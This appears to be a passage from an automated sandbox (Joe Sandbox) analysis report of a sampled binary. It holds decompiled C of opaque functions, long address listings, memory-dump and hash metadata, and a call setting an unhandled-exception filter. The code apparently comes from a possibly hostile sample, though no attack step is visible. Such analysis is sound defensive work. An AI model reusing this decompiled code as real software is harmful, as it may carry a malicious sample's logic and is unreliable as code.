																												__eflags =  *((intOrPtr*)(_t582 + 0x10)) - 1;
																												if( *((intOrPtr*)(_t582 + 0x10)) == 1) {
																													goto L130;
																												}
																												__eflags = _t717;
																												if(__eflags < 0) {
																													L129:
																													_t244 = _t721 - 0x1070; // -2160
																													E003D9A3C(_t244,  *(_t582 + 0x32f8),  *(_t582 + 0x32fc));
																													 *(_t721 - 0x28) =  *(_t582 + 0x32f8);
																													 *(_t721 - 0x24) =  *(_t582 + 0x32fc);
																													goto L130;
																												}
																												if(__eflags > 0) {
																													L126:
																													_t515 = E003D981A(_t695);
																													__eflags = _t695 -  *(_t582 + 0x32f4);
																													if(__eflags < 0) {
																														goto L130;
																													}
																													if(__eflags > 0) {
																														goto L129;
																													}
																													__eflags = _t515 -  *(_t582 + 0x32f0);
																													if(_t515 <=  *(_t582 + 0x32f0)) {
																														goto L130;
																													}
																													goto L129;
																												}
																												__eflags = _t695 - 0x5f5e100;
																												if(_t695 < 0x5f5e100) {
																													goto L129;
																												}
																												goto L126;
																											}
																											__eflags = _t650 - _t695;
																											if(_t650 <= _t695) {
																												goto L130;
																											}
																											goto L122;
																										}
																										__eflags = _t695 - 0xf4240;
																										if(_t695 <= 0xf4240) {
																											goto L131;
																										}
																										goto L119;
																									}
																									L113:
																									_t202 = _t697 + 0xec;
																									 *_t202 =  *(_t697 + 0xec) + 1;
																									__eflags =  *_t202;
																									goto L114;
																								}
																								 *((char*)(_t721 - 0x12)) = 0;
																								_t517 = 0x50;
																								__eflags = _t616 - _t517;
																								if(_t616 != _t517) {
																									_t196 = _t721 - 0x1070; // -2160
																									__eflags = E003D98BC(_t196);
																									if(__eflags != 0) {
																										E003D2021(__eflags, 0x3b, _t582 + 0x32, _t697 + 0x1100);
																										E003D6E98(0x411098, _t721, _t582 + 0x32, _t697 + 0x1100);
																									}
																								}
																								goto L113;
																							}
																							 *(_t697 + 0x10ff) = 1;
																							__eflags =  *((char*)(_t435 + 0x7201));
																							if( *((char*)(_t435 + 0x7201)) != 0) {
																								_t436 =  *(_t721 - 0xd);
																								goto L112;
																							}
																							goto L107;
																						}
																						 *(_t721 - 0xd) = _t431;
																						 *(_t721 - 0xe) = _t431;
																						_t185 = _t721 - 0x30b8; // -10424
																						_t525 = L003E1B7F(__eflags, _t185, 0, 0, _t431);
																						__eflags = _t525;
																						if(_t525 != 0) {
																							goto L104;
																						}
																						__eflags = 0;
																						 *(_t721 - 0x24) = 0;
																						L102:
																						_t187 = _t721 - 0x1070; // -2160
																						E003D959A(_t187);
																						_t406 =  *(_t721 - 0x24);
																						goto L15;
																					}
																					_t180 = _t721 - 0x1070; // -2160
																					_push(_t582);
																					_t529 = E003D7FC0(_t697);
																					_t613 = _t529;
																					 *(_t721 - 0xe) = _t529;
																					L97:
																					__eflags = _t613;
																					if(_t613 != 0) {
																						goto L104;
																					}
																					goto L98;
																				}
																				__eflags =  *(_t721 - 0xe);
																				if( *(_t721 - 0xe) != 0) {
																					_t530 =  *(_t721 - 0x18);
																					__eflags = _t530 - 0x50;
																					if(_t530 != 0x50) {
																						_t657 = 0x49;
																						__eflags = _t530 - _t657;
																						if(_t530 != _t657) {
																							_t658 = 0x45;
																							__eflags = _t530 - _t658;
																							if(_t530 != _t658) {
																								_t531 =  *(_t697 + 8);
																								__eflags =  *((intOrPtr*)(_t531 + 0x7160)) - 1;
																								if( *((intOrPtr*)(_t531 + 0x7160)) != 1) {
																									 *(_t697 + 0xec) =  *(_t697 + 0xec) + 1;
																									_t178 = _t721 - 0x30b8; // -10424
																									_push(_t582);
																									E003D7DB2(_t697);
																								}
																							}
																						}
																					}
																				}
																				goto L102;
																			}
																			__eflags = _t611 - 5;
																			if(_t611 == 5) {
																				goto L88;
																			}
																			_t613 =  *(_t721 - 0xe);
																			__eflags = _t613;
																			if(_t613 == 0) {
																				goto L99;
																			}
																			_t616 =  *(_t721 - 0x18);
																			__eflags = _t616 - _t688;
																			if(_t616 == _t688) {
																				goto L105;
																			}
																			_t534 =  *(_t697 + 8);
																			__eflags =  *((char*)(_t534 + 0x7201));
																			if( *((char*)(_t534 + 0x7201)) != 0) {
																				goto L105;
																			}
																			_t719 = _t697 + 0x1100;
																			 *((char*)(_t721 - 0x12)) = 0;
																			_t536 = E003DA231(_t719);
																			__eflags = _t536;
																			if(_t536 == 0) {
																				L86:
																				__eflags =  *((char*)(_t721 - 0x12));
																				if( *((char*)(_t721 - 0x12)) == 0) {
																					goto L104;
																				}
																				L87:
																				_t613 = 0;
																				 *(_t721 - 0xe) = 0;
																				goto L97;
																			}
																			__eflags =  *((char*)(_t721 - 0x12));
																			if( *((char*)(_t721 - 0x12)) != 0) {
																				goto L87;
																			}
																			__eflags = 0;
																			_push(0);
																			_push(_t582 + 0x32d8);
																			_push( *(_t582 + 0x32fc));
																			_t167 = _t721 - 0x12; // 0x7ee
																			_push( *(_t582 + 0x32f8));
																			_push(0x800);
																			_push(_t719);
																			_push(0);
																			_push( *(_t697 + 8));
																			E003D92A3();
																			goto L86;
																		}
																		__eflags =  *((char*)(_t582 + 0x3359));
																		if( *((char*)(_t582 + 0x3359)) == 0) {
																			goto L77;
																		}
																		_t137 = _t721 - 0x2c; // 0x7d4
																		_t543 = E003F0C4A(_t582 + 0x335a, _t137, 8);
																		_t723 = _t725 + 0xc;
																		__eflags = _t543;
																		if(_t543 == 0) {
																			goto L77;
																		}
																		__eflags =  *(_t582 + 0x6cdc);
																		_t697 =  *((intOrPtr*)(_t721 - 0x1c));
																		if( *(_t582 + 0x6cdc) != 0) {
																			goto L78;
																		}
																		__eflags =  *((char*)(_t697 + 0x10fe));
																		_t142 = _t721 - 0x30b8; // -10424
																		_push(_t582 + 0x32);
																		if(__eflags != 0) {
																			_push(6);
																			E003D2021(__eflags);
																			E003D6D83(0x411098, 0xb);
																			 *(_t721 - 0xe) = 0;
																			goto L78;
																		}
																		_push(0x83);
																		E003D2021(__eflags);
																		E003DF279( *(_t697 + 8) + 0x6024);
																		 *(_t721 - 4) =  *(_t721 - 4) | 0xffffffff;
																		_t147 = _t721 - 0x1174; // -2420
																		L003DF204(_t147);
																	}
																}
																E003D6D83(0x411098, 2);
																_t554 = E003D1F47(_t582);
																__eflags =  *(_t582 + 0x6ccc);
																_t406 = _t554 & 0xffffff00 |  *(_t582 + 0x6ccc) == 0x00000000;
																goto L15;
															}
															_t106 = _t721 - 0x10a8; // -2216
															_t556 = E003D7BE7(_t106, _t582 + 0x32d8);
															__eflags = _t556;
															if(_t556 == 0) {
																goto L65;
															}
															__eflags =  *((char*)(_t721 - 0x10ac));
															if( *((char*)(_t721 - 0x10ac)) == 0) {
																L63:
																 *(_t721 - 0xe) = 0;
																goto L65;
															}
															_t108 = _t721 - 0x10a8; // -2216
															_t558 = E003D7BCA(_t108, _t697);
															__eflags = _t558;
															if(_t558 == 0) {
																goto L65;
															}
															goto L63;
														}
														__eflags = _t707 - _t686;
														if(_t707 != _t686) {
															goto L65;
														}
														goto L59;
													}
													__eflags =  *((char*)(_t411 + 0x715c));
													if( *((char*)(_t411 + 0x715c)) == 0) {
														goto L65;
													}
													goto L57;
												}
												__eflags =  *(_t697 + 0x1100);
												if( *(_t697 + 0x1100) == 0) {
													goto L54;
												}
												 *(_t721 - 0xe) = 1;
												__eflags =  *(_t582 + 0x3330);
												if( *(_t582 + 0x3330) == 0) {
													goto L55;
												}
												goto L54;
											}
											__eflags = _t707 - _t400;
											_t401 = 1;
											if(_t707 != _t400) {
												goto L50;
											}
											goto L49;
										}
										L45:
										_t689 =  *(_t582 + 0x6ccc);
										 *(_t721 - 0xd) = _t689;
										 *(_t721 - 0x28) = _t689;
										__eflags = _t689;
										if(_t689 == 0) {
											goto L220;
										}
										_t685 = 0;
										__eflags = 0;
										goto L47;
									}
									_t398 =  *(_t697 + 8);
									__eflags =  *(_t398 + 0x6127);
									if( *(_t398 + 0x6127) == 0) {
										goto L44;
									}
									__eflags =  *(_t582 + 0x6ccc);
									if( *(_t582 + 0x6ccc) != 0) {
										goto L14;
									}
									 *(_t721 - 0x11) = 0;
									goto L45;
								}
								__eflags =  *(_t697 + 0xf4) -  *((intOrPtr*)(_t586 + 0xb334));
								if( *(_t697 + 0xf4) <  *((intOrPtr*)(_t586 + 0xb334))) {
									goto L29;
								}
								__eflags =  *((char*)(_t697 + 0xf9));
								if( *((char*)(_t697 + 0xf9)) != 0) {
									goto L14;
								}
								goto L29;
							}
							if(__eflags < 0) {
								L25:
								 *(_t582 + 0x32f8) = _t684;
								 *(_t582 + 0x32fc) = _t684;
								goto L26;
							}
							__eflags =  *(_t582 + 0x32f8) - _t684;
							if( *(_t582 + 0x32f8) >= _t684) {
								goto L26;
							}
							goto L25;
						}
						if(__eflags < 0) {
							L21:
							 *(_t582 + 0x32f0) = _t684;
							 *(_t582 + 0x32f4) = _t684;
							goto L22;
						}
						__eflags =  *(_t582 + 0x32f0) - _t684;
						if( *(_t582 + 0x32f0) >= _t684) {
							goto L22;
						}
						goto L21;
					}
					if(_t383 != 3) {
						__eflags = _t383 - 5;
						if(_t383 != 5) {
							goto L9;
						}
						__eflags =  *((char*)(_t582 + 0x45c4));
						if( *((char*)(_t582 + 0x45c4)) == 0) {
							goto L14;
						}
						_push(_t585);
						_push(_t684);
						_push(_t704);
						_push(_t582);
						_t573 = E003E8C8D();
						__eflags = _t573;
						if(_t573 != 0) {
							__eflags = 0;
							 *0x403278( *((intOrPtr*)(_t582 + 0x6cb8)),  *((intOrPtr*)(_t582 + 0x6cbc)), 0);
							 *((intOrPtr*)( *((intOrPtr*)( *_t582 + 0x10))))();
							goto L17;
						}
						L13:
						E003D6D83(0x411098, 1);
						goto L14;
					} else {
						if( *(_t697 + 0x10ff) != 0) {
							E003D7A0D(_t582, _t721,  *(_t697 + 8), _t582, _t697 + 0x1100);
						}
						goto L9;
					}
				}
				if( *((intOrPtr*)(__ecx + 0x67)) == 0) {
					goto L14;
				}
				_push(_t585);
				_push(0);
				_t704 = __ecx + 0x10;
				_push(_t704);
				_push(_t582);
				 *(_t721 - 0x20) = _t704;
				if(E003E8C8D() == 0) {
					goto L13;
				} else {
					_t585 =  *(_t721 - 0x18);
					_t684 = 0;
					goto L5;
				}
			}
































































































                0x003d8493
                0x003d849d
                0x003d84a3
                0x003d84a6
                0x003d84aa
                0x003d84ac
                0x003d84b2
                0x003d84b9
                0x003d84bf
                0x003d84e0
                0x003d84e3
                0x003d84e6
                0x003d84e6
                0x003d84ef
                0x003d857a
                0x003d8580
                0x003d8586
                0x003d859e
                0x003d859e
                0x003d85a4
                0x003d85bc
                0x003d85bc
                0x003d85bf
                0x003d85c5
                0x003d85e2
                0x003d85e7
                0x003d85eb
                0x003d85f5
                0x003d8600
                0x003d8605
                0x003d8607
                0x003d860b
                0x003d860d
                0x003d860f
                0x003d8613
                0x003d8615
                0x003d8617
                0x003d8617
                0x003d8613
                0x003d861f
                0x003d8625
                0x003d8633
                0x003d863b
                0x003d8642
                0x003d8645
                0x003d869c
                0x003d86a1
                0x003d86a3
                0x003d86a5
                0x003d86ab
                0x003d86b1
                0x003d86b5
                0x003d86b5
                0x003d86b5
                0x003d86b5
                0x003d8647
                0x003d864a
                0x003d8650
                0x003d8652
                0x003d8654
                0x003d8658
                0x003d865a
                0x003d8661
                0x003d8666
                0x003d8667
                0x003d866e
                0x003d8673
                0x003d867d
                0x003d867f
                0x003d8695
                0x003d8681
                0x003d8683
                0x003d868a
                0x003d868c
                0x003d868c
                0x003d867f
                0x003d8658
                0x003d8652
                0x003d86be
                0x003d86c3
                0x003d86db
                0x003d86e6
                0x003d86ee
                0x003d86f1
                0x003d86f3
                0x003d86f5
                0x003d86f7
                0x003d86fa
                0x003d86fd
                0x003d8703
                0x003d8721
                0x003d8721
                0x003d8724
                0x003d873c
                0x003d873f
                0x003d8744
                0x003d874a
                0x003d874b
                0x003d874d
                0x003d8756
                0x003d8756
                0x003d8758
                0x003d875b
                0x003d8765
                0x003d876c
                0x003d8771
                0x003d8773
                0x003d8543
                0x003d8543
                0x003d8543
                0x003d8545
                0x003d854b
                0x003d8553
                0x003d8553
                0x003d8779
                0x003d877e
                0x003d8786
                0x003d8787
                0x003d878a
                0x003d8791
                0x003d8792
                0x003d8799
                0x003d879c
                0x003d87b3
                0x003d87b3
                0x003d87b6
                0x003d87b6
                0x003d87bb
                0x003d87be
                0x003d87c5
                0x003d87c6
                0x003d87c9
                0x003d87cc
                0x003d87d7
                0x003d87d7
                0x003d87da
                0x003d87e1
                0x003d87e1
                0x003d87e7
                0x003d87ee
                0x003d87ef
                0x003d87fd
                0x003d8802
                0x003d8804
                0x003d883c
                0x003d883f
                0x003d884b
                0x003d884b
                0x003d884b
                0x003d884e
                0x003d884e
                0x003d8858
                0x003d885d
                0x003d885f
                0x003d8883
                0x003d8883
                0x003d888a
                0x00000000
                0x00000000
                0x003d888c
                0x003d8896
                0x003d889b
                0x003d889d
                0x003d897f
                0x00000000
                0x003d897f
                0x003d88a3
                0x003d88a6
                0x003d88b4
                0x003d88b5
                0x003d88b5
                0x003d88b7
                0x003d88b9
                0x003d88d5
                0x003d88df
                0x003d88e9
                0x003d88fb
                0x003d8900
                0x003d8907
                0x003d89a5
                0x003d89a5
                0x003d89a8
                0x003d89a8
                0x003d89ac
                0x003d89b2
                0x003d89b7
                0x003d89bd
                0x003d89c2
                0x003d89ca
                0x003d89cb
                0x003d89ce
                0x003d89d3
                0x003d89d4
                0x003d89d6
                0x003d8a5f
                0x003d8a61
                0x003d8a66
                0x003d8a68
                0x003d8ab6
                0x003d8ab9
                0x003d8abb
                0x003d8ad5
                0x003d8ad7
                0x003d8ad7
                0x003d8ad8
                0x003d8ad8
                0x003d8adf
                0x003d8b14
                0x003d8b16
                0x003d910c
                0x003d910c
                0x003d9110
                0x003d9116
                0x003d911b
                0x003d911f
                0x003d9122
                0x003d9125
                0x003d9127
                0x003d9127
                0x003d9127
                0x003d9127
                0x003d912d
                0x003d912d
                0x003d9131
                0x00000000
                0x00000000
                0x003d9137
                0x003d9139
                0x003d8576
                0x003d8576
                0x00000000
                0x003d8576
                0x003d913f
                0x003d9145
                0x003d8513
                0x003d8515
                0x00000000
                0x003d8515
                0x003d914b
                0x003d914d
                0x00000000
                0x003d914d
                0x003d8b1c
                0x003d8b1c
                0x003d8b1f
                0x003d8b1f
                0x003d8b22
                0x003d8b29
                0x003d8b3b
                0x003d8b3b
                0x003d8b3e
                0x003d8b40
                0x003d8b87
                0x003d8b87
                0x003d8b8b
                0x003d8b8d
                0x003d8b95
                0x003d8b95
                0x003d8ba9
                0x003d8baf
                0x003d8bb5
                0x003d8bbb
                0x003d8bcc
                0x003d8be2
                0x003d8be7
                0x003d8bed
                0x003d8bf0
                0x003d8bf6
                0x003d8bf9
                0x003d8bfc
                0x003d8c03
                0x003d8c06
                0x003d8c0c
                0x003d8c11
                0x003d8c14
                0x003d8c16
                0x003d8c19
                0x003d8c1c
                0x003d8c1f
                0x003d8c22
                0x003d8c25
                0x003d8c27
                0x003d8cd6
                0x003d8cd6
                0x003d8cd9
                0x003d8ce0
                0x003d8ce7
                0x003d8ceb
                0x003d8d01
                0x003d8d01
                0x003d8d03
                0x003d8d06
                0x003d8d06
                0x003d8d0a
                0x003d8d0e
                0x003d8d12
                0x003d8e40
                0x003d8e47
                0x003d8e49
                0x003d8e50
                0x003d8e73
                0x003d8e74
                0x003d8e7a
                0x003d8e7f
                0x003d8e91
                0x003d8e97
                0x003d8e99
                0x003d8e9f
                0x003d8eb9
                0x003d8e52
                0x003d8e52
                0x003d8e58
                0x003d8e5e
                0x003d8e5f
                0x003d8e5f
                0x003d8e50
                0x003d8ebe
                0x003d8ec0
                0x003d8ec5
                0x003d8ecc
                0x003d8efe
                0x003d8efe
                0x003d8efe
                0x003d8f00
                0x003d8f02
                0x003d8f02
                0x003d8f09
                0x003d8f13
                0x003d8f1a
                0x003d8f39
                0x003d8f39
                0x003d8f3d
                0x003d8f40
                0x003d8f98
                0x003d8f98
                0x003d8f9c
                0x003d8f9f
                0x003d8fb2
                0x003d8fb2
                0x003d8fb2
                0x003d8fb4
                0x003d8fb4
                0x003d8fb8
                0x00000000
                0x00000000
                0x003d8fbe
                0x003d8fc1
                0x003d8fc5
                0x003d8fd1
                0x003d8fd1
                0x003d8fd5
                0x003d8ff0
                0x003d8ff0
                0x003d8ff2
                0x003d9007
                0x003d9007
                0x003d9009
                0x003d90cd
                0x003d90cd
                0x003d90d0
                0x003d90d7
                0x003d90df
                0x003d90e6
                0x003d90eb
                0x003d90ed
                0x003d90f6
                0x003d9100
                0x003d9100
                0x003d90ed
                0x003d9105
                0x00000000
                0x003d9105
                0x003d900f
                0x003d9014
                0x003d9016
                0x003d9019
                0x003d901f
                0x003d901f
                0x003d9021
                0x003d9033
                0x003d9033
                0x003d9039
                0x003d903e
                0x003d9047
                0x003d905b
                0x003d9062
                0x003d9075
                0x003d9077
                0x003d9080
                0x003d9085
                0x003d908b
                0x003d909a
                0x003d90ad
                0x003d90c0
                0x003d90c2
                0x003d90c5
                0x003d90ca
                0x00000000
                0x003d90ca
                0x003d9023
                0x003d9029
                0x00000000
                0x00000000
                0x003d902b
                0x003d9031
                0x00000000
                0x00000000
                0x00000000
                0x003d9031
                0x003d901b
                0x003d901d
                0x00000000
                0x00000000
                0x00000000
                0x003d901d
                0x003d8ff4
                0x003d8ff7
                0x003d8ffe
                0x00000000
                0x00000000
                0x003d9004
                0x00000000
                0x003d9004
                0x003d8fd7
                0x003d8fd9
                0x00000000
                0x00000000
                0x003d8fdb
                0x003d8fe2
                0x00000000
                0x00000000
                0x003d8fe8
                0x003d8fea
                0x00000000
                0x00000000
                0x00000000
                0x003d8fea
                0x003d8fc7
                0x003d8fcb
                0x00000000
                0x00000000
                0x00000000
                0x003d8fcb
                0x003d8fa1
                0x003d8fa8
                0x00000000
                0x00000000
                0x003d8faa
                0x003d8fac
                0x00000000
                0x00000000
                0x003d8fae
                0x00000000
                0x003d8fae
                0x003d8f42
                0x003d8f46
                0x00000000
                0x00000000
                0x003d8f48
                0x003d8f4a
                0x00000000
                0x00000000
                0x003d8f4c
                0x003d8f52
                0x003d8f71
                0x003d8f71
                0x003d8f73
                0x003d8f73
                0x003d8f74
                0x003d8f80
                0x003d8f8c
                0x003d8f90
                0x003d8f95
                0x00000000
                0x003d8f95
                0x003d8f54
                0x003d8f5a
                0x003d8f64
                0x003d8f64
                0x003d8f6b
                0x00000000
                0x00000000
                0x003d8f6d
                0x00000000
                0x003d8f6d
                0x003d8f5c
                0x003d8f62
                0x00000000
                0x00000000
                0x00000000
                0x003d8f62
                0x003d8f1c
                0x003d8f22
                0x00000000
                0x00000000
                0x003d8f24
                0x003d8f2e
                0x003d8f2e
                0x003d8f30
                0x003d8f32
                0x003d8f32
                0x00000000
                0x003d8f30
                0x003d8f26
                0x003d8f2c
                0x00000000
                0x00000000
                0x00000000
                0x003d8f2c
                0x003d8f0b
                0x00000000
                0x003d8f0b
                0x003d8edd
                0x003d8eef
                0x003d8ef4
                0x003d8ef6
                0x00000000
                0x00000000
                0x003d8ef8
                0x003d8efa
                0x00000000
                0x003d8efa
                0x003d8d18
                0x003d8d1e
                0x003d8d21
                0x003d8d8a
                0x003d8d8f
                0x003d8d9d
                0x003d8da2
                0x003d8da7
                0x003d8dad
                0x003d8db0
                0x003d8db7
                0x003d8db8
                0x003d8dbd
                0x003d8dc0
                0x003d8dc2
                0x003d8e19
                0x003d8e19
                0x003d8e1c
                0x003d8e1c
                0x003d8e23
                0x003d8d57
                0x003d8d57
                0x003d8d59
                0x003d8e36
                0x003d8e36
                0x003d8e36
                0x003d8e38
                0x003d8e38
                0x00000000
                0x003d8e38
                0x003d8d5f
                0x003d8d5f
                0x003d8d61
                0x00000000
                0x00000000
                0x003d8d67
                0x00000000
                0x003d8d67
                0x003d8e29
                0x003d8e2b
                0x00000000
                0x00000000
                0x003d8d53
                0x003d8d53
                0x00000000
                0x003d8d53
                0x003d8dc4
                0x003d8dcc
                0x00000000
                0x00000000
                0x003d8dce
                0x003d8dd4
                0x003d8de0
                0x003d8de1
                0x003d8de4
                0x003d8dfa
                0x003d8dfb
                0x003d8e02
                0x003d8e07
                0x003d8e09
                0x003d8e0c
                0x003d8e0c
                0x003d8e0e
                0x003d8d50
                0x003d8d50
                0x00000000
                0x003d8d50
                0x003d8e14
                0x00000000
                0x003d8e14
                0x003d8de6
                0x003d8de9
                0x003d8dee
                0x003d8dee
                0x003d8df0
                0x00000000
                0x003d8df0
                0x003d8d23
                0x003d8d26
                0x00000000
                0x00000000
                0x003d8d28
                0x003d8d2b
                0x003d8d6e
                0x003d8d6e
                0x003d8d70
                0x00000000
                0x00000000
                0x003d8d7c
                0x003d8d83
                0x00000000
                0x003d8d83
                0x003d8d2d
                0x003d8d30
                0x00000000
                0x00000000
                0x003d8d32
                0x003d8d35
                0x00000000
                0x00000000
                0x003d8d44
                0x003d8d49
                0x003d8d4b
                0x003d8d4d
                0x00000000
                0x003d8d4d
                0x003d8ced
                0x003d8cef
                0x00000000
                0x00000000
                0x003d8cf3
                0x003d8cf4
                0x003d8cf8
                0x00000000
                0x00000000
                0x003d8cfa
                0x003d8cfc
                0x00000000
                0x003d8cfc
                0x003d8c2d
                0x003d8c33
                0x00000000
                0x00000000
                0x003d8c39
                0x003d8c41
                0x003d8c47
                0x003d8c49
                0x003d8cd1
                0x003d8cd1
                0x003d8cd1
                0x003d8cd3
                0x00000000
                0x003d8cd3
                0x003d8c4f
                0x003d8c59
                0x003d8c59
                0x003d8c69
                0x003d8c6c
                0x003d8c6e
                0x003d8cce
                0x003d8cce
                0x00000000
                0x003d8cce
                0x003d8c70
                0x003d8c76
                0x003d8c76
                0x003d8c7a
                0x00000000
                0x00000000
                0x003d8c7e
                0x003d8c80
                0x003d8ca5
                0x003d8cab
                0x003d8cb7
                0x003d8cc2
                0x003d8ccb
                0x00000000
                0x003d8ccb
                0x003d8c82
                0x003d8c8c
                0x003d8c8e
                0x003d8c93
                0x003d8c99
                0x00000000
                0x00000000
                0x003d8c9b
                0x00000000
                0x00000000
                0x003d8c9d
                0x003d8ca3
                0x00000000
                0x00000000
                0x00000000
                0x003d8ca3
                0x003d8c84
                0x003d8c8a
                0x00000000
                0x00000000
                0x00000000
                0x003d8c8a
                0x003d8c72
                0x003d8c74
                0x00000000
                0x00000000
                0x00000000
                0x003d8c74
                0x003d8c51
                0x003d8c57
                0x00000000
                0x00000000
                0x00000000
                0x003d8c57
                0x003d8b8f
                0x003d8b8f
                0x003d8b8f
                0x003d8b8f
                0x00000000
                0x003d8b8f
                0x003d8b46
                0x003d8b49
                0x003d8b4a
                0x003d8b4d
                0x003d8b4f
                0x003d8b5a
                0x003d8b5c
                0x003d8b6b
                0x003d8b7d
                0x003d8b7d
                0x003d8b5c
                0x00000000
                0x003d8b4d
                0x003d8b2b
                0x003d8b32
                0x003d8b39
                0x003d8b84
                0x00000000
                0x003d8b84
                0x00000000
                0x003d8b39
                0x003d8ae2
                0x003d8ae5
                0x003d8aec
                0x003d8af3
                0x003d8af8
                0x003d8afa
                0x00000000
                0x00000000
                0x003d8afc
                0x003d8afe
                0x003d8b01
                0x003d8b01
                0x003d8b07
                0x003d8b0c
                0x00000000
                0x003d8b0c
                0x003d8abd
                0x003d8ac6
                0x003d8ac7
                0x003d8acc
                0x003d8ace
                0x003d8ad1
                0x003d8ad1
                0x003d8ad3
                0x00000000
                0x00000000
                0x00000000
                0x003d8ad3
                0x003d8a6a
                0x003d8a6e
                0x003d8a74
                0x003d8a77
                0x003d8a7b
                0x003d8a83
                0x003d8a84
                0x003d8a87
                0x003d8a8b
                0x003d8a8c
                0x003d8a8f
                0x003d8a91
                0x003d8a97
                0x003d8a9d
                0x003d8a9f
                0x003d8aa5
                0x003d8aac
                0x003d8aaf
                0x003d8aaf
                0x003d8a9d
                0x003d8a8f
                0x003d8a87
                0x003d8a7b
                0x00000000
                0x003d8a6e
                0x003d89dc
                0x003d89df
                0x00000000
                0x00000000
                0x003d89e1
                0x003d89e4
                0x003d89e6
                0x00000000
                0x00000000
                0x003d89ec
                0x003d89ef
                0x003d89f2
                0x00000000
                0x00000000
                0x003d89f8
                0x003d89fb
                0x003d8a02
                0x00000000
                0x00000000
                0x003d8a0a
                0x003d8a11
                0x003d8a14
                0x003d8a19
                0x003d8a1b
                0x003d8a4c
                0x003d8a4c
                0x003d8a50
                0x00000000
                0x00000000
                0x003d8a56
                0x003d8a58
                0x003d8a5a
                0x00000000
                0x003d8a5a
                0x003d8a1d
                0x003d8a21
                0x00000000
                0x00000000
                0x003d8a23
                0x003d8a2b
                0x003d8a2c
                0x003d8a2d
                0x003d8a33
                0x003d8a36
                0x003d8a3d
                0x003d8a42
                0x003d8a43
                0x003d8a44
                0x003d8a47
                0x00000000
                0x003d8a47
                0x003d890d
                0x003d8914
                0x00000000
                0x00000000
                0x003d891c
                0x003d8927
                0x003d892c
                0x003d892f
                0x003d8931
                0x00000000
                0x00000000
                0x003d8933
                0x003d893a
                0x003d893d
                0x00000000
                0x00000000
                0x003d893f
                0x003d8946
                0x003d8950
                0x003d8951
                0x003d898b
                0x003d898d
                0x003d8999
                0x003d89a0
                0x00000000
                0x003d89a0
                0x003d8953
                0x003d8958
                0x003d8966
                0x003d896b
                0x003d896f
                0x003d8975
                0x003d8975
                0x003d8883
                0x003d8868
                0x003d886f
                0x003d8874
                0x003d887b
                0x00000000
                0x003d887b
                0x003d880d
                0x003d8813
                0x003d8818
                0x003d881a
                0x00000000
                0x00000000
                0x003d881c
                0x003d8823
                0x003d8835
                0x003d8837
                0x00000000
                0x003d8837
                0x003d8826
                0x003d882c
                0x003d8831
                0x003d8833
                0x00000000
                0x00000000
                0x00000000
                0x003d8833
                0x003d87dc
                0x003d87df
                0x00000000
                0x00000000
                0x00000000
                0x003d87df
                0x003d87ce
                0x003d87d5
                0x00000000
                0x00000000
                0x00000000
                0x003d87d5
                0x003d879e
                0x003d87a5
                0x00000000
                0x00000000
                0x003d87a7
                0x003d87ab
                0x003d87b1
                0x00000000
                0x00000000
                0x00000000
                0x003d87b1
                0x003d874f
                0x003d8752
                0x003d8754
                0x00000000
                0x00000000
                0x00000000
                0x003d8754
                0x003d8726
                0x003d8726
                0x003d872c
                0x003d872f
                0x003d8732
                0x003d8734
                0x00000000
                0x00000000
                0x003d873a
                0x003d873a
                0x00000000
                0x003d873a
                0x003d8705
                0x003d8708
                0x003d870e
                0x00000000
                0x00000000
                0x003d8710
                0x003d8716
                0x00000000
                0x00000000
                0x003d871c
                0x00000000
                0x003d871c
                0x003d85cd
                0x003d85d3
                0x00000000
                0x00000000
                0x003d85d5
                0x003d85dc
                0x00000000
                0x00000000
                0x00000000
                0x003d85dc
                0x003d85a6
                0x003d85b0
                0x003d85b0
                0x003d85b6
                0x00000000
                0x003d85b6
                0x003d85a8
                0x003d85ae
                0x00000000
                0x00000000
                0x00000000
                0x003d85ae
                0x003d8588
                0x003d8592
                0x003d8592
                0x003d8598
                0x00000000
                0x003d8598
                0x003d858a
                0x003d8590
                0x00000000
                0x00000000
                0x00000000
                0x003d8590
                0x003d84f8
                0x003d851c
                0x003d851f
                0x00000000
                0x00000000
                0x003d8521
                0x003d8528
                0x00000000
                0x00000000
                0x003d852a
                0x003d852b
                0x003d852c
                0x003d852d
                0x003d852e
                0x003d8533
                0x003d8535
                0x003d8558
                0x003d856c
                0x003d8574
                0x00000000
                0x003d8574
                0x003d8537
                0x003d853e
                0x00000000
                0x003d84fa
                0x003d8501
                0x003d850e
                0x003d850e
                0x00000000
                0x003d8501
                0x003d84f8
                0x003d84c4
                0x00000000
                0x00000000
                0x003d84c6
                0x003d84c7
                0x003d84c8
                0x003d84cb
                0x003d84cc
                0x003d84cd
                0x003d84d7
                0x00000000
                0x003d84d9
                0x003d84d9
                0x003d84dc
                0x00000000
                0x003d84dc

                APIs
                Memory Dump Source
                • Source File: 00000000.00000002.269928331.00000000003D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003D0000, based on PE: true
                • Associated: 00000000.00000002.269921825.00000000003D0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269950645.0000000000403000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.000000000040E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000415000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269960651.0000000000432000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.269975577.0000000000433000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_3d0000_004349256789197.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: ce1e106b1ffa4d87bc7b992306666e4d2c677d4ea2513a552e21ba9bef202b64
                • Instruction ID: f4cb694ee102617f6cdb67b182956b26e3b9a074a134a93ebb03f83d559b5503
                • Opcode Fuzzy Hash: ce1e106b1ffa4d87bc7b992306666e4d2c677d4ea2513a552e21ba9bef202b64
                • Instruction Fuzzy Hash: 9382EC72904145AEDF17DF64E891BFAB779AF05300F0941BBD8499F382DB316A88CB60
                Uniqueness

                Uniqueness Score: -1.00%

                Function 003EF9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                Download Yara Rule
                C-Code - Quality: 100%
                			E003EF9D5() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E003EF9F0); // executed
				return _t1;
			}




                0x003ef9da
                0x003ef9e0

                APIs
                • SetUnhandledExceptionFilter.KERNELBASE(Function_0001F9F0,003EF3A5), ref: 003EF9DA
